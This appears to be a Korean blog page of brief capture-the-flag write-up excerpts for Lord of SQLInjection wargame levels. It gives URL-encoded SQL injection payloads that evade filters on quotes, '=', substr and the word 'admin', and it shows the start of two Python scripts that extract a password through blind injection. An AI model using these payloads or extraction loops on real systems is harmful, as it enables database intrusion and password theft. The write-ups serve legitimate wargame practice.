Bace

문제는 다음과 같다. pw와 no 모두 '를 필터링 하고 있고, no는 substr과 ascii를 필터링 하고 있다. 근데 no는 '' 로 받지 않고 그냥 받아 들이므로, '를 통해 빠져나갈 필요가 없다. 그러므로 no쪽으로 공격을 하는데, admin을 문자로 인식 시키기 위해 char를 썼다. ?pw=&no=1%20or%20id%20like%20char(97,100,109,105,110)%20and%20ord(mid(pw,1,1))%20like%201%20--%20- 이와 같이 보내주었다. import requests answer = '' for i in range(1,9): for j in range(33,128): url = "https://los.rubiya.kr/chall/darkknight_5..

문제는 다음과 같다. orge 문제와 똑같지만, 이번에는 =과 substr이 필터링 되어있다. like를 통해 =을 우회하고, mid를 통해 substr을 우회하였다. import requests answer = '' for i in range(1,9): for j in range(33,128): url = "https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw=%27%20||%20id like 'admin' %26%26 ascii(mid(pw,{},1))%20like%20{}%20--%20-".format(i,j) cookies = {'PHPSESSID':'자신의 PHPSESSID'} response = requests.ge..

문제는 다음과 같다. id만 admin이면 풀리는 문제 같다. pw 값에 0을 넣어주고 or id=admin 을 넣어준 후 뒤에 주석 처리해서 보내보았다. ?pw=0%27%20or%20id=%27admin%27%23 solve

문제는 다음과 같다. admin을 공백으로 바꿔준다. adadminmin 으로 우회해서 보내보았다. solve